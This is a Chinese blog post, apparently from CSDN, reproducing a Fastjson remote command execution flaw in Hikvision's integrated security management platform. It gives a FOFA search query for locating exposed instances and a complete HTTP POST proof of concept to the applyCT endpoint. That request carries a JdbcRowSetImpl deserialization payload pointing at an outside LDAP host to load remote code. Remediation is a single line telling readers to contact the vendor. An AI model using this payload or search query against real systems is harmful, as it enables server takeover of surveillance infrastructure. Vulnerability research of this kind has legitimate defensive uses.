【漏洞复现】Hikvision综合安防管理平台Fastjson命令执行漏洞

最新推荐文章于 2024-05-30 10:13:55 发布
最新推荐文章于 2024-05-30 10:13:55 发布
阅读量824 收藏 7
点赞数 11
分类专栏: 【漏洞复现M】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135762886
版权

 Nx01 产品简介

        Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。

Nx02 漏洞描述

        Hikvision综合安防管理平台applyCT存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。

Nx03 产品主页

fofa-query: body="/portal/skin/isee/redblack/"

Nx04 漏洞复现

POC:

POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: {{Hostname}}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 194

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.ceye.io","autoCommit":true},"hfe4zyyzldp":"="}

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】复现海康综合安防管理平台 applyCT Fastjson远程命令执行漏洞
记录并分享学习安全的知识点..
07-24 605
海康威视综合安防管理平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度,海康综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。
海康威视综合安防管理平台存在Fastjson远程命令执行漏洞
nnn2188185的博客
04-26 866
海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞执行系统命令,直接获取服务器权限。
漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 7686
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
HiKVISION 综合安防管理平台 env信息泄漏漏洞,2024年最新网络安全源码剖析之Framwork层消息传递
2301_76225520的博客
04-13 553
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 1676
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
复现-fastjson远程命令执行漏洞
luson2014的博客
12-12 4202
fastjson远程命令执行漏洞 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。
漏洞复现】海康威视综合安防管理平台 iSecure Center applyCT fastjson 远程代码执行
siu~
05-21 525
海康威视综合安防管理平台 `iSecure Center applyCT fastjson` 远程代码执行
FastJson远程命令执行漏洞
PassionNingG的博客
09-03 1303
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。文章内容多来于如有侵权立删。# FastJson远程命令执行漏洞学习笔记fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
HIKVISION iVMS-8700 综合安防管理平台软件 配置指南 V3.0.0.pdf
08-14
HIKVISION iVMS-8700 综合安防管理平台软件 配置指南 V3.0.0.pdf
HIKVISION iSecure Center 综合安防管理平台 操作指南 V1.1.0.chm
09-04
HIKVISION iSecure Center 综合安防管理平台 操作指南 V1.1.0
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0.zip
05-11
HIKVISION iSecure Center 综合安防管理平台 快速配置手册旨在引导用户完成中心管理服务的安装部署,必要设备接入及配置、特殊使用场景的配置,使得用户能够快速开始使用本产品
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0.pdf
09-04
HIKVISION iSecure Center 综合安防管理平台 快速配置手册 V1.1.0
HIKVISION iSecure Center 综合安防管理平台 安装部署指南 V1.1.0
03-07
HIKVISION iSecure Center 综合安防管理平台 安装部署指南 V1.1.0 提供平台的操作,最新版本都可以跟厂家索要!
构建坚不可摧的Web安全防线:深入剖析二阶注入与全面防御策略
weixin_43822401的博客
05-27 780
SQL注入攻击通过在用户输入中嵌入恶意SQL代码,企图让数据库执行这些非法命令,从而达到窃取、破坏或篡改数据的目的。
网络安全岗秋招面试题及面试经验分享
最新发布
HUANGXIN9898的博客
05-30 708
这就是一个典型的事务,这个事务是不可分割的最小工作单元,整个事务中的所有操作要么全部提交成功,要么全部失败回滚,不可能只执行其中一部分,这也是事务的原子性特征。写锁是排他的,即一个写锁会阻塞其它的写锁和读锁,只有这样,才能确保给定时间内,只有一个用户能执行写入,防止其它用户读取正在写入的同一资源。学校攻防演练时担任的角色,主要工作内容,渗透测试的思路,有什么成果(这个问的还是挺细的,具体到分配的任务、有没有拿下主机或者域控、攻防演练的形式和持续时间等都聊了)索引是帮助MySQL高效获取数据的数据结构。
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 189
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
【网络安全】新的恶意软件:无文件恶意软件GhostHook正在广泛传播
par@ish的博客
05-29 758
利用系统工具:它利用操作系统的内置工具或管理脚本,例如PowerShell、Windows Script Host (wscript/wsh)、Mshta.exe等,这些工具通常无需额外下载文件即可执行复杂的命令和脚本,为恶意行为提供了便利。持久化机制:虽然名为“无文件”,但无文件恶意软件可能会通过修改注册表项、设置计划任务或利用合法服务来实现自身的持久化,确保即使系统重启也能继续存在。隐蔽性高:由于缺乏明显的文件痕迹,无文件恶意软件极难被发现,对传统的基于文件的防护措施构成了挑战。
海康威视(hikvision) isecure center 综合安防管理平台怎么开门禁卡
09-09
海康威视的iSecure Center综合安防管理平台是一种集视频监控、门禁管理、报警系统等功能于一体的安全管理软件。 要开门禁卡,首先需要在iSecure Center中进行相应设置。首先,登录到iSecure Center的管理界面。在界面上可以找到“门禁管理”或类似的选项,点击进入。在门禁管理界面,可以管理所有的门禁设备和相应的相关设置。 接下来,需要进行卡片管理。点击“卡片管理”或类似选项,进入卡片管理界面。在这个界面上,可以添加、删除、修改卡片信息。 点击“添加”按钮,进入添加卡片的界面。在这个界面上,需要填写相关的卡片信息,如卡片号码、姓名、部门等。填写完毕后,保存并退出。 在添加完卡片信息后,需要进行权限设置。点击“权限设置”或类似选项,进入权限设置界面。在这个界面上,可以设置每张卡片的权限,如进入哪些区域、在什么时间段内可以进入等。 设置完权限后,即可将卡片发放给需要的人员。发放卡片时,需要将卡片与相应的读卡器进行配对。使用配对工具将卡片放在读卡器上,进行读卡器与卡片的配对操作。 配对成功后,人员就可以使用该卡片进行门禁管理了。只需将卡片放在读卡器上,系统会验证卡片的有效性,并根据权限判断是否开启门禁。 总的来说,通过iSecure Center综合安防管理平台开门禁卡的过程就是登录平台、进入门禁管理界面、添加卡片信息、设置权限、配对卡片与读卡器,最后使用卡片进行门禁管理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值